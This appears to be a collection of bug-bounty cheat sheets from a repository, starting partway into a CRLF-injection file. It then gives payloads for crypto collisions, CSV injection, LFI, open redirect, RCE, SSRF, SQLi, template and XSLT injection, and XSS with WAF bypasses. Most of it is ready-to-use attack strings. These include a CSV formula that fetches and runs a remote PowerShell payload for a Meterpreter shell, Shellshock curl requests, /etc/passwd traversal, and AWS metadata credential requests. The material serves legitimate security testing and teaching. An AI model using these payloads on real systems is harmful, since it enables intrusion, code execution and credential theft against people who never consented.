80 | %0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2e%2e
81 | ```
82 | 
83 | **Response splitting on 302 Redirect, before Location header** (Discovered in DoD)
84 | 
85 | ```
86 | %0d%0aContent-Type:%20text%2fhtml%0d%0aHTTP%2f1.1%20200%20OK%0d%0aContent-Type:%20text%2fhtml%0d%0a%0d%0a%3Cscript%3Ealert('XSS');%3C%2fscript%3E
87 | ```
88 | 
89 | **Response splitting on 301 code, chained with Open Redirect to corrupt location header and to break 301** by [@black2fan](https://twitter.com/black2fan) (Facebook bug)
90 | 
91 | _Note:_ `xxx:1` was used for breaking open redirect destination (Location header). Great example how of to escalate CRLF to XSS on a such, it would seem, unexploitable 301 status code.
92 | 
93 | ```
94 | %2Fxxx:1%2F%0aX-XSS-Protection:0%0aContent-Type:text/html%0aContent-Length:39%0a%0a%3cscript%3ealert(document.cookie)%3c/script%3e%2F..%2F..%2F..%2F../tr
95 | ```
96 | 


--------------------------------------------------------------------------------
/cheatsheets/crypto.md:
--------------------------------------------------------------------------------
 1 | ## Crypto
 2 | 
 3 | **MD5 Collision Strings**
 4 | 
 5 | ```
 6 | %4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2
 7 | ```
 8 | 
 9 | ```
10 | %4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
11 | ```
12 | 
13 | <details>
14 | 	<summary>URL decode strings.</summary>
15 | 	<pre><code>4dc968ff0ee35c209572d4777b721587d36fa7b21bdc56b74a3dc0783e7b9518afbfa200a8284bf36e8e4b55b35f427593d849676da0d1555d8360fb5f07fea2</code></pre>
16 | 	<pre><code>4dc968ff0ee35c209572d4777b721587d36fa7b21bdc56b74a3dc0783e7b9518afbfa202a8284bf36e8e4b55b35f427593d849676da0d1d55d8360fb5f07fea2</code></pre>
17 | </details><br>
18 | 
19 | **SHA-1 Collision Strings**
20 | 
21 | ```
22 | %25%50%44%46%2D%31%2E%33%0A%25%E2%E3%CF%D3%0A%0A%0A%31%20%30%20%6F%62%6A%0A%3C%3C%2F%57%69%64%74%68%20%32%20%30%20%52%2F%48%65%69%67%68%74%20%33%20%30%20%52%2F%54%79%70%65%20%34%20%30%20%52%2F%53%75%62%74%79%70%65%20%35%20%30%20%52%2F%46%69%6C%74%65%72%20%36%20%30%20%52%2F%43%6F%6C%6F%72%53%70%61%63%65%20%37%20%30%20%52%2F%4C%65%6E%67%74%68%20%38%20%30%20%52%2F%42%69%74%73%50%65%72%43%6F%6D%70%6F%6E%65%6E%74%20%38%3E%3E%0A%73%74%72%65%61%6D%0A%FF%D8%FF%FE%00%24%53%48%41%2D%31%20%69%73%20%64%65%61%64%21%21%21%21%21%85%2F%EC%09%23%39%75%9C%39%B1%A1%C6%3C%4C%97%E1%FF%FE%01%73%46%DC%91%66%B6%7E%11%8F%02%9A%B6%21%B2%56%0F%F9%CA%67%CC%A8%C7%F8%5B%A8%4C%79%03%0C%2B%3D%E2%18%F8%6D%B3%A9%09%01%D5%DF%45%C1%4F%26%FE%DF%B3%DC%38%E9%6A%C2%2F%E7%BD%72%8F%0E%45%BC%E0%46%D2%3C%57%0F%EB%14%13%98%BB%55%2E%F5%A0%A8%2B%E3%31%FE%A4%80%37%B8%B5%D7%1F%0E%33%2E%DF%93%AC%35%00%EB%4D%DC%0D%EC%C1%A8%64%79%0C%78%2C%76%21%56%60%DD%30%97%91%D0%6B%D0%AF%3F%98%CD%A4%BC%46%29%B1
23 | ```
24 | 
25 | ```
26 | %25%50%44%46%2D%31%2E%33%0A%25%E2%E3%CF%D3%0A%0A%0A%31%20%30%20%6F%62%6A%0A%3C%3C%2F%57%69%64%74%68%20%32%20%30%20%52%2F%48%65%69%67%68%74%20%33%20%30%20%52%2F%54%79%70%65%20%34%20%30%20%52%2F%53%75%62%74%79%70%65%20%35%20%30%20%52%2F%46%69%6C%74%65%72%20%36%20%30%20%52%2F%43%6F%6C%6F%72%53%70%61%63%65%20%37%20%30%20%52%2F%4C%65%6E%67%74%68%20%38%20%30%20%52%2F%42%69%74%73%50%65%72%43%6F%6D%70%6F%6E%65%6E%74%20%38%3E%3E%0A%73%74%72%65%61%6D%0A%FF%D8%FF%FE%00%24%53%48%41%2D%31%20%69%73%20%64%65%61%64%21%21%21%21%21%85%2F%EC%09%23%39%75%9C%39%B1%A1%C6%3C%4C%97%E1%FF%FE%01%7F%46%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2%56%0B%45%CA%67%D6%88%C7%F8%4B%8C%4C%79%1F%E0%2B%3D%F6%14%F8%6D%B1%69%09%01%C5%6B%45%C1%53%0A%FE%DF%B7%60%38%E9%72%72%2F%E7%AD%72%8F%0E%49%04%E0%46%C2%30%57%0F%E9%D4%13%98%AB%E1%2E%F5%BC%94%2B%E3%35%42%A4%80%2D%98%B5%D7%0F%2A%33%2E%C3%7F%AC%35%14%E7%4D%DC%0F%2C%C1%A8%74%CD%0C%78%30%5A%21%56%64%61%30%97%89%60%6B%D0%BF%3F%98%CD%A8%04%46%29%A1
27 | ```
28 | 
29 | <details>
30 | 	<summary>URL decode strings.</summary>
31 | 	<pre><code>255044462D312E330A25E2E3CFD30A0A0A312030206F626A0A3C3C2F57696474682032203020522F4865696768742033203020522F547970652034203020522F537562747970652035203020522F46696C7465722036203020522F436F6C6F7253706163652037203020522F4C656E6774682038203020522F42697473506572436F6D706F6E656E7420383E3E0A73747265616D0AFFD8FFFE00245348412D3120697320646561642121212121852FEC092339759C39B1A1C63C4C97E1FFFE017F46DC93A6B67E013B029AAA1DB2560B45CA67D688C7F84B8C4C791FE02B3DF614F86DB1690901C56B45C1530AFEDFB76038E972722FE7AD728F0E4904E046C230570FE9D41398ABE12EF5BC942BE33542A4802D98B5D70F2A332EC37FAC3514E74DDC0F2CC1A874CD0C78305A21566461309789606BD0BF3F98CDA8044629A1</code></pre>
32 | 	<pre><code>255044462D312E330A25E2E3CFD30A0A0A312030206F626A0A3C3C2F57696474682032203020522F4865696768742033203020522F547970652034203020522F537562747970652035203020522F46696C7465722036203020522F436F6C6F7253706163652037203020522F4C656E6774682038203020522F42697473506572436F6D706F6E656E7420383E3E0A73747265616D0AFFD8FFFE00245348412D3120697320646561642121212121852FEC092339759C39B1A1C63C4C97E1FFFE017346DC9166B67E118F029AB621B2560FF9CA67CCA8C7F85BA84C79030C2B3DE218F86DB3A90901D5DF45C14F26FEDFB3DC38E96AC22FE7BD728F0E45BCE046D23C570FEB141398BB552EF5A0A82BE331FEA48037B8B5D71F0E332EDF93AC3500EB4DDC0DECC1A864790C782C76215660DD309791D06BD0AF3F98CDA4BC4629B1</code></pre>
33 | </details><br>
34 | 
35 | **Bcrypt (BSD) Wraparound Bug**
36 | 
37 | `$2a$` Bcrypt hashes were vulnerable to a wraparound bug where the first string in the list below would output the same hash as the next strings.
38 | 
39 | ```
40 | 000000000000000000000000000000000000000000000000000000000000000000000000
41 | ```
42 | 
43 | ```
44 | 012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234
45 | ```
46 | 
47 | ```
48 | 0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345
49 | ```
50 | 
51 | **Length extension attack**
52 | 
53 | In cryptography and computer security, a length extension attack is a type of attack where an attacker can use `Hash(message1)` and the length of `message1` to calculate `Hash(message1 ∥ message2)` for an attacker-controlled `message2`.
54 | 
55 | In Summary: Given a hash that is composed of a string with an unknown prefix, an attacker can append to the string and produce a new hash that still has the unknown prefix.
56 | 
57 | An example:
58 | 
59 | ```
60 | http://example.com/download?file=report.pdf&mac=563162c9c71a17367d44c165b84b85ab59d036f9
61 | ```
62 | 
63 | ```
64 | http://example.com/download?file=report.pdf%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00
65 | 
66 | %00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00
67 | 
68 | %00%00%A8/../../../../../../../etc/passwd&mac=ee40aa8ec0cfafb7e2ec4de20943b673968857a5
69 | ```
70 | A related HackerOne report: https://hackerone.com/reports/251572
71 | 
72 | Tool to extend a hash: https://github.com/iagox86/hash_extender
73 | 
74 | More details about the attack:
75 | 
76 | https://www.whitehatsec.com/blog/hash-length-extension-attacks/
77 | https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks
78 | 


--------------------------------------------------------------------------------
/cheatsheets/csv-injection.md:
--------------------------------------------------------------------------------
 1 | ## CSV Injection
 2 | 
 3 | **Newline character**
 4 | 
 5 | ```
 6 | %0A-3+3+cmd|' /C calc'!D2
 7 | ```
 8 | 
 9 | **Meterpreter Shell**
10 | 
11 | ```
12 | =cmd|'/C powershell IEX(wget bit.ly/1X146m3)'!A0
13 | ```


--------------------------------------------------------------------------------
/cheatsheets/lfi.md:
--------------------------------------------------------------------------------
 1 | ## LFI
 2 | 
 3 | **Filter Bypass**
 4 | 
 5 | ```
 6 | ../\
 7 | ```
 8 | 
 9 | ```
10 | ..\/
11 | ```
12 | 
13 | ```
14 | /..
15 | ```
16 | 
17 | ```
18 | \/..
19 | ```
20 | 
21 | ```
22 | /%5c..
23 | ```
24 | 
25 | **FFmpeg Local File Disclosure**
26 | 
27 | This [script](https://github.com/neex/ffmpeg-avi-m3u-xbin/blob/master/gen_xbin_avi.py) by @neex can be used to disclose local files on FFmpeg hosts which parse externally-referencing [HLS playlists](https://ffmpeg.org/ffmpeg-formats.html#hls-2).
28 | 
29 | _Steps to reproduce_
30 | 
31 | 1. Please download the script from @neex to your "attacker" instance
32 | 2. Execute the script with your desired parameters: `python3 gen_xbin_avi.py file:///etc/hostname bugbounty.avi`
33 | 3. Upload the generated AVI file to your target site (e.g. within a 'video upload page')
34 | 4. The target may process the malicious HLS inclusion with FFmpeg on the server-side.
35 | 5. Play the uploaded AVI via the target site. If successful, your desired file will be disclosed within the video.
36 | 
37 | Alternative scripts exist which may generate different HLS formats or lead to the desired file being disclosed in a different manner.
38 | 
39 | **Blogs**
40 | * http://pastie.org/840199
41 | * http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/
42 | * http://www.notsosecure.com/folder2/2010/08/20/lfi-code-exec-remote-root/?utm_source=twitterfeed&utm_medium=twitter
43 | * http://labs.neohapsis.com/2008/07/21/local-file-inclusion-%E2%80%93-tricks-of-the-trade/
44 | * http://www.digininja.org/blog/when_all_you_can_do_is_read.php
45 | 


--------------------------------------------------------------------------------
/cheatsheets/open-redirect.md:
--------------------------------------------------------------------------------
  1 | ## Open Redirect
  2 | 
  3 | ```
  4 | /%09/google.com
  5 | ```
  6 | 
  7 | ```
  8 | /%5cgoogle.com
  9 | ```
 10 | 
 11 | ```
 12 | //www.google.com/%2f%2e%2e
 13 | ```
 14 | 
 15 | ```
 16 | //www.google.com/%2e%2e
 17 | ```
 18 | 
 19 | ```
 20 | //google.com/
 21 | ```
 22 | 
 23 | ```
 24 | //google.com/%2f..
 25 | ```
 26 | 
 27 | ```
 28 | //\google.com
 29 | ```
 30 | 
 31 | ```
 32 | /\victim.com:80%40google.com
 33 | ```
 34 | 
 35 | ## Possible open redirect parameters
 36 | 
 37 | ```
 38 | ?url=http://{target}
 39 | ```
 40 | 
 41 | ```
 42 | ?url=https://{target}
 43 | ```
 44 | 
 45 | ```
 46 | ?next=http://{target}
 47 | ```
 48 | 
 49 | ```
 50 | ?next=https://{target}
 51 | ```
 52 | 
 53 | ```
 54 | ?url=https://{target}
 55 | ```
 56 | 
 57 | ```
 58 | ?url=http://{target}
 59 | ```
 60 | 
 61 | ```
 62 | ?url=//{target}
 63 | ```
 64 | 
 65 | ```
 66 | ?url=$2f%2f{target}
 67 | ```
 68 | 
 69 | ```
 70 | ?next=//{target}
 71 | ```
 72 | 
 73 | ```
 74 | ?next=$2f%2f{target}
 75 | ```
 76 | 
 77 | ```
 78 | ?url=//{target}
 79 | ```
 80 | 
 81 | ```
 82 | ?url=$2f%2f{target}
 83 | ```
 84 | 
 85 | ```
 86 | ?url=//{target}
 87 | ```
 88 | 
 89 | ```
 90 | /redirect/{target}
 91 | ```
 92 | 
 93 | ```
 94 | /cgi-bin/redirect.cgi?{target}
 95 | ```
 96 | 
 97 | ```
 98 | /out/{target}
 99 | ```
100 | 
101 | ```
102 | /out?{target}
103 | ```
104 | 
105 | ```
106 | /out?/{target}
107 | ```
108 | 
109 | ```
110 | /out?//{target}
111 | ```
112 | 
113 | ```
114 | /out?/\{target}
115 | ```
116 | 
117 | ```
118 | /out?///{target}
119 | ```
120 | 
121 | ```
122 | ?view={target}
123 | ```
124 | 
125 | ```
126 | ?view=/{target}
127 | ```
128 | 
129 | ```
130 | ?view=//{target}
131 | ```
132 | 
133 | ```
134 | ?view=/\{target}
135 | ```
136 | 
137 | ```
138 | ?view=///{target}
139 | ```
140 | 
141 | ```
142 | /login?to={target}
143 | ```
144 | 
145 | ```
146 | /login?to=/{target}
147 | ```
148 | 
149 | ```
150 | /login?to=//{target}
151 | ```
152 | 
153 | ```
154 | /login?to=/\{target}
155 | ```
156 | 
157 | ```
158 | /login?to=///{target}
159 | ```
160 | 
161 | 
162 | 
163 | **Open Redirect Payloads** by @cujanovic
164 | 
165 | https://github.com/cujanovic/Open-Redirect-Payloads
166 | 
167 | 
168 | **Open Redirect Paramters** by @fuzzdb-project
169 | 
170 | https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/redirect/redirect-urls-template.txt
171 | 


--------------------------------------------------------------------------------
/cheatsheets/practice-platforms.md:
--------------------------------------------------------------------------------
 1 | ## Practice Platforms
 2 | 
 3 | - [Pentesterlab](https://pentesterlab.com/)
 4 | - [XSS Game](https://xss-game.appspot.com/)
 5 | - [Hack This Site](https://www.hackthissite.org)
 6 | - [Root-Me](https://www.root-me.org)
 7 | - [HackTheBox](https://www.hackthebox.eu)
 8 | - [Hack Me](https://hack.me) 
 9 | - [CTF 365](https://ctf365.com)
10 | - [Google Gruyere](https://google-gruyere.appspot.com/)
11 | - [OWASP Juice Shop](http://juice-shop.herokuapp.com/)
12 | - [Hack Yourself First](http://hackyourselffirst.troyhunt.com/)
13 | - [flAWS Cloud](http://flaws.cloud/)
14 | - [bWAPP](http://www.itsecgames.com/)
15 | - [OWASP Mutillidae] (https://www.owasp.org/index.php/OWASP_Mutillidae_2_Project)
16 | - [tryhackme](https://tryhackme.com/)
17 | - [Portswigger Labs](https://portswigger.net/web-security/all-labs)
18 | 


--------------------------------------------------------------------------------
/cheatsheets/rce.md:
--------------------------------------------------------------------------------
 1 | ## RCE
 2 | 
 3 | **Werkzeug Debugger**
 4 | 
 5 | Find somewhere where user input can be supplied and submit the following string to cause an error:
 6 | 
 7 | ```
 8 | strіng
 9 | ```
10 | 
11 | If the target is running their application in debug mode you might be able to run commands. If you are running the target locally, you can probably brute-force the debugger PIN. The debugger PIN is always in the following format: `***-***-***`.
12 | 
13 | **Basic Bypasses**
14 | 
15 | ```
16 | i'''d
17 | i"""d
18 | ```
19 | 
20 | ```
21 | \l\s -l\a\h
22 | ```
23 | 
24 | ```
25 | cat /e?c/p?ss??
26 | cat /e??/??ss*
27 | ```
28 | 
29 | ```
30 | {ls,}
31 | {ls,-a}
32 | ```
33 | 
34 | **Shellshock Bug**
35 | 
36 | ```bash
37 | () { :;}; echo vulnerable
38 | ```
39 | 
40 | ```zsh
41 | curl -H "User-Agent: () { :; }; /bin/eject" http://example.com/
42 | ```
43 | 


--------------------------------------------------------------------------------
/cheatsheets/recon.md:
--------------------------------------------------------------------------------
 1 | # Certspotter
 2 | 
 3 | ```zsh
 4 | curl https://certspotter.com/api/v0/certs\?domain\=example.com | jq '.[].dns_names[]' | sed 's/\"//g' | sed 's/\*\.//g' | uniq
 5 | ```
 6 | 
 7 | ```zsh
 8 | curl https://certspotter.com/api/v0/certs\?domain\=example.com | jq '.[].dns_names[]' | sed 's/\"//g' | sed 's/\*\.//g' | uniq | dig +short -f - | uniq | nmap -T5 -Pn -sS -i - -p 80,443,21,22,8080,8081,8443 --open -n -oG -
 9 | ```
10 | 
11 | # Sublist3r One-liner
12 | 
13 | This runs [Sublist3r](https://github.com/aboul3la/Sublist3r) on a list of domains and outputs the results in separate files.
14 | 
15 | ```
16 | . <(cat domains | xargs -n1 -i{} python sublist3r.py -d {} -o {}.txt)
17 | ```
18 | 
19 | # [Apktool](https://ibotpeaches.github.io/Apktool/) to [LinkFinder](https://github.com/GerbenJavado/LinkFinder)
20 | 
21 | ```
22 | apktool d app.apk; cd app;mkdir collection; find . -name \*.smali -exec sh -c "cp {} collection/\$(head /dev/urandom | md5 | cut -d' ' -f1).smali" \;; linkfinder -i 'collection/*.smali' -o cli
23 | ```
24 | 
25 | # [Aquatone](https://github.com/michenriksen/aquatone/) One-liner
26 | 
27 | ```
28 | $ echo "aquatone-discover -d \$1 && aquatone-scan -d \$1 --ports huge && aquatone-takeover -d \$1 && aquatone-gather -d \$1" >> aqua.sh && chmod +x aqua.sh
29 | $./aqua.sh domain.com
30 | ```
31 | 
32 | # [relative-url-extractor](https://github.com/jobertabma/relative-url-extractor)
33 | 
34 | ```
35 | $ ruby extract.rb demo-file.js
36 | $ ruby extract.rb https://hackerone.com/some-file.js
37 | $ ruby extract.rb '|cat demo-file.js' -c
38 | ```
39 | 


--------------------------------------------------------------------------------
/cheatsheets/special-tools.md:
--------------------------------------------------------------------------------
 1 | ## Special Tools
 2 | 
 3 | **Resolution**
 4 | 
 5 | - http://dnsbin.zhack.ca (DNS)
 6 | - http://pingb.in (DNS)
 7 | - https://www.mockbin.org/ (HTTP)
 8 | 
 9 | **Wildcard DNS**
10 | 
11 | - http://xip.io
12 | 
13 | ```
14 | 10.0.0.1.xip.io
15 | www.10.0.0.1.xip.io
16 | mysite.10.0.0.1.xip.io
17 | foo.bar.10.0.0.1.xip.io
18 | ```
19 | 
20 | - http://nip.io
21 | 
22 | ```
23 | 10.0.0.1.nip.io
24 | app.10.0.0.1.nip.io
25 | customer1.app.10.0.0.1.nip.io
26 | customer2.app.10.0.0.1.nip.io
27 | otherapp.10.0.0.1.nip.io
28 | ```
29 | 
30 | **Reconnaissance**
31 | 
32 | - https://spyse.com (fully-fledged recon service)
33 | - https://dnsdumpster.com (DNS and subdomain recon)
34 | - [Reverse IP Lookup](http://reverseip.domaintools.com/) (Domainmonitor)
35 | - [Security headers](https://securityheaders.io/) (Security Report, missing headers)
36 | - http://threatcrowd.org (WHOIS, DNS, email, and subdomain recon)
37 | - https://mxtoolbox.com (wide range of DNS-related recon tools)
38 | - https://publicwww.com/ (Source Code Search Engine)
39 | - http://ipv4info.com/ (Find domains in the IP block owned by a Company/Organization)
40 | - [HackerTarget Tools](https://hackertarget.com/ip-tools/) (DNS recon, site lookup, and scanning tools)
41 | - [VirusTotal](https://virustotal.com/en-gb/domain/google.com/information/) (WHOIS, DNS, and subdomain recon)
42 | - [crt.sh](https://crt.sh/?q=%25.uber.com) (SSL certificate search)
43 | - [Google CT](https://transparencyreport.google.com/https/certificates) (SSL certificate transparency search)
44 | - [PenTest Tools](https://pentest-tools.com/information-gathering/google-hacking) (Google dorks)
45 | - [Wayback Machine](https://archive.org/web/) (Find stuff which was hosted on the domain in past)
46 | - [FindSubdomains](https://findsubdomains.com/) (Find subdomains using domain or keywords)
47 | 
48 | 
49 | 
50 | **Report Templates**
51 | 
52 | - https://github.com/fransr/template-generator
53 | - https://github.com/ZephrFish/BugBountyTemplates
54 | 


--------------------------------------------------------------------------------
/cheatsheets/sqli.md:
--------------------------------------------------------------------------------
 1 | ## SQLI
 2 | 
 3 | **Akamai Kona Bypass**
 4 | 
 5 | * `MID` instead of `SUBSTRING`
 6 | * `LIKE` instead of `=`
 7 | * `/**/` instead of a `space`
 8 | * `CURRENT_USER` instead of `CURRENT_USER()`
 9 | * ` "` instead of `'`
10 | 
11 | Final example: 
12 | 
13 | ```sql
14 | 444/**/OR/**/MID(CURRENT_USER,1,1)/**/LIKE/**/"p"/**/#
15 | ```
16 | 
17 | **Blogs**
18 | 
19 | * http://pentestmonkey.net/blog/mssql-sql-injection-cheat-sheet/
20 | * http://isc.sans.edu/diary.html?storyid=9397
21 | * http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
22 | * http://xd-blog.com.ar/descargas/manuales/bugs/full-mssql-injection-pwnage.html
23 | * http://securityoverride.com/articles.php?article_id=1&article=The_Complete_Guide_to_SQL_Injections
24 | * http://websec.wordpress.com/2010/03/19/exploiting-hard-filtered-sql-injections/
25 | * http://sqlzoo.net/hack/
26 | * http://www.sqlteam.com/article/sql-server-versions
27 | * http://www.krazl.com/blog/?p=3
28 | * http://www.owasp.org/index.php/Testing_for_MS_Access
29 | * http://web.archive.org/web/20101112061524/http://seclists.org/pen-test/2003/May/0074.html
30 | * http://web.archive.org/web/20080822123152/http://www.webapptest.org/ms-access-sql-injection-cheat-sheet-EN.html
31 | * http://www.youtube.com/watch?v=WkHkryIoLD0
32 | * http://layerone.info/archives/2009/Joe%20McCray%20-%20Advanced%20SQL%20Injection%20-%20L1%202009.pdf
33 | * http://vimeo.com/3418947
34 | * http://sla.ckers.org/forum/read.php?24,33903
35 | * http://websec.files.wordpress.com/2010/11/sqli2.pdf
36 | * http://old.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/
37 | * http://ha.ckers.org/sqlinjection/
38 | * http://lab.mediaservice.net/notes_more.php?id=MSSQL
39 | 


--------------------------------------------------------------------------------
/cheatsheets/ssrf.md:
--------------------------------------------------------------------------------
 1 | ## SSRF
 2 | 
 3 | ```
 4 | http://0177.1/
 5 | ```
 6 | 
 7 | ```
 8 | http://0x7f.1/
 9 | ```
10 | 
11 | ```
12 | http://127.000.000.1
13 | ```
14 | 
15 | ```
16 | https://520968996
17 | ```
18 | 
19 | _Note:_ The latter can be calculated using http://www.subnetmask.info/
20 | 
21 | **Exotic Handlers**
22 | 
23 | ```
24 | gopher://, dict://, php://, jar://, tftp://
25 | ```
26 | 
27 | **IPv6**
28 | 
29 | ```
30 | http://[::1]
31 | ```
32 | 
33 | ```
34 | http://[::]
35 | ```
36 | 
37 | **Wildcard DNS**
38 | 
39 | ```
40 | 10.0.0.1.xip.io
41 | www.10.0.0.1.xip.io
42 | mysite.10.0.0.1.xip.io
43 | foo.bar.10.0.0.1.xip.io
44 | ```
45 | _Link:_ http://xip.io
46 | 
47 | ```
48 | 10.0.0.1.nip.io
49 | app.10.0.0.1.nip.io
50 | customer1.app.10.0.0.1.nip.io
51 | customer2.app.10.0.0.1.nip.io
52 | otherapp.10.0.0.1.nip.io
53 | ```
54 | 
55 | _Link:_ http://nip.io
56 | 
57 | **AWS EC2 Metadata**
58 | 
59 | ```
60 | http://169.254.169.254/latest/meta-data/  
61 | ```
62 | 
63 | ```
64 | http://169.254.169.254/latest/meta-data/local-hostname
65 | ```
66 | 
67 | ```
68 | http://169.254.169.254/latest/meta-data/public-hostname
69 | ```
70 | 
71 | > If there is an IAM role associated with the instance, role-name is the name of the role, and role-name contains the temporary security credentials associated with the role [...]
72 | 
73 | _Link:_ http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html (includes a comprehensive Instance Metadata Categories table)
74 | 


--------------------------------------------------------------------------------
/cheatsheets/template-injection.md:
--------------------------------------------------------------------------------
 1 | ## Template Injection
 2 | 
 3 | **Ruby**
 4 | 
 5 | ```ruby
 6 | <%=`id`%>
 7 | ```
 8 | 
 9 | **Twig**
10 | 
11 | The following payload should output `49`.
12 | 
13 | ```
14 | {{7*'7'}}
15 | ```
16 | 
17 | **Jinja**
18 | 
19 | This payload should output `7777777`.
20 | 
21 | ```
22 | {{7*'7'}}
23 | ```
24 | 


--------------------------------------------------------------------------------
/cheatsheets/xslt.md:
--------------------------------------------------------------------------------
 1 | ## XSLT Injection
 2 | 
 3 | **Backend infos**
 4 | 
 5 | ```xml
 6 | <?xml version="1.0" encoding="UTF-8"?>
 7 | <html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
 8 | 	<body>
 9 | 		<xsl:text>xsl:vendor = </xsl:text><xsl:value-of select="system-property('xsl:vendor')"/><br/>
10 | 		<xsl:text>xsl:version = </xsl:text><xsl:value-of select="system-property('xsl:version')"/><br/>
11 | 	</body>
12 | </html>
13 | ```
14 | 
15 | **Injecting in PHP**
16 | 
17 | ```xml
18 | <?xml version="1.0" encoding="UTF-8"?>
19 | <html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
20 | 	<body>
21 | 		<xsl:value-of name="bugbounty" select="php:function('phpinfo')"/>
22 | 	</body>
23 | </html>
24 | ```
25 | 
26 | 


--------------------------------------------------------------------------------
/cheatsheets/xss.md:
--------------------------------------------------------------------------------
  1 | ## XSS
  2 | 
  3 | **Chrome XSS-Auditor Bypass** by [@vivekchsm](https://twitter.com/vivekchsm)
  4 | 
  5 | ```html
  6 | <svg><animate xlink:href=#x attributeName=href values=&#106;avascript:alert(1) /><a id=x><rect width=100 height=100 /></a>
  7 | ```
  8 | 
  9 | **Chrome < v60 beta XSS-Auditor Bypass**
 10 | 
 11 | ```html
 12 | <script src="data:,alert(1)%250A-->
 13 | ```
 14 | 
 15 | **Other Chrome XSS-Auditor Bypasses**
 16 | 
 17 | ```html
 18 | <script>alert(1)</script
 19 | ```
 20 | 
 21 | ```html
 22 | <script>alert(1)%0d%0a-->%09</script
 23 | ```
 24 | 
 25 | ```html
 26 | <x>%00%00%00%00%00%00%00<script>alert(1)</script>
 27 | ```
 28 | 
 29 | **Safari XSS Vector** by [@mramydnei](https://twitter.com/mramydnei/status/902470271327551489)
 30 | 
 31 | ```html
 32 | <script>location.href;'javascript:alert%281%29'</script>
 33 | ```
 34 | 
 35 | **XSS Polyglot** by [Ahmed Elsobky](https://github.com/0xSobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot)
 36 | 
 37 | ```
 38 | jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
 39 | ```
 40 | 
 41 | **Kona WAF (Akamai) Bypass**
 42 | 
 43 | ```html
 44 | \');confirm(1);//
 45 | ```
 46 | 
 47 | **ModSecurity WAF Bypass**
 48 | Note: This kind of depends on what security level the application is set to. See: https://modsecurity.org/rules.html
 49 | ```html
 50 | <img src=x onerror=prompt(document.domain) onerror=prompt(document.domain) onerror=prompt(document.domain)>
 51 | ```
 52 | 
 53 | **Wordfence XSS Bypasses**
 54 | 
 55 | ```html
 56 | <meter onmouseover="alert(1)"
 57 | ```
 58 | 
 59 | ```html
 60 | '">><div><meter onmouseover="alert(1)"</div>"
 61 | ```
 62 | 
 63 | ```html
 64 | >><marquee loop=1 width=0 onfinish=alert(1)>
 65 | ```
 66 | 
 67 | **Incapsula WAF Bypasses** by [@i_bo0om](https://twitter.com/i_bo0om)
 68 | 
 69 | ```html
 70 | <iframe/onload='this["src"]="javas&Tab;cript:al"+"ert``"';>
 71 | ```
 72 | 
 73 | ```html
 74 | <img/src=q onerror='new Function`al\ert\`1\``'>
 75 | ```
 76 | 
 77 | **jQuery < 3.0.0 XSS**
 78 |  by [Egor Homakov](https://github.com/jquery/jquery/issues/2432)
 79 | 
 80 | ```js
 81 | $.get('http://sakurity.com/jqueryxss')
 82 | ```
 83 | 
 84 | In order to really exploit this jQuery XSS you will need to fulfil one of the following requirements:
 85 | 
 86 | 1) Find any cross domain requests to untrusted domains which may inadvertently execute script.
 87 | 2) Find any requests to trusted API endpoints where script can be injected into data sources.
 88 | 
 89 | **URL verification bypasses (works without `&#x09;` too)**
 90 | 
 91 | ```
 92 | javas&#x09;cript://www.google.com/%0Aalert(1)
 93 | ```
 94 | 
 95 | **Markdown XSS**
 96 | 
 97 | ```md
 98 | [a](javascript:confirm(1))
 99 | ```
100 | 
101 | ```md
102 | [a](javascript://www.google.com%0Aprompt(1))
103 | ```
104 | 
105 | ```md
106 | [a](javascript://%0d%0aconfirm(1))
107 | ```
108 | 
109 | ```md
110 | [a](javascript://%0d%0aconfirm(1);com)
111 | ```
112 | 
113 | ```md
114 | [a](javascript:window.onerror=confirm;throw%201)
115 | ```
116 | 
117 | ```md
118 | [a]: (javascript:prompt(1))
119 | ```
120 | 
121 | ```md
122 | [a]:(
javascript:alert(1))           //Add SOH Character
123 | ```
124 | 
125 | 
126 | **Flash SWF XSS**
127 | 
128 | - ZeroClipboard: `ZeroClipboard.swf?id=\"))}catch(e){confirm(/XSS./.source);}//&width=500&height=500&.swf`
129 | 
130 | - plUpload Player: `plupload.flash.swf?%#target%g=alert&uid%g=XSS&`
131 | 
132 | - plUpload MoxiePlayer: `Moxie.swf?target%g=confirm&uid%g=XSS` (also works with `Moxie.cdn.swf` and other variants)
133 | 
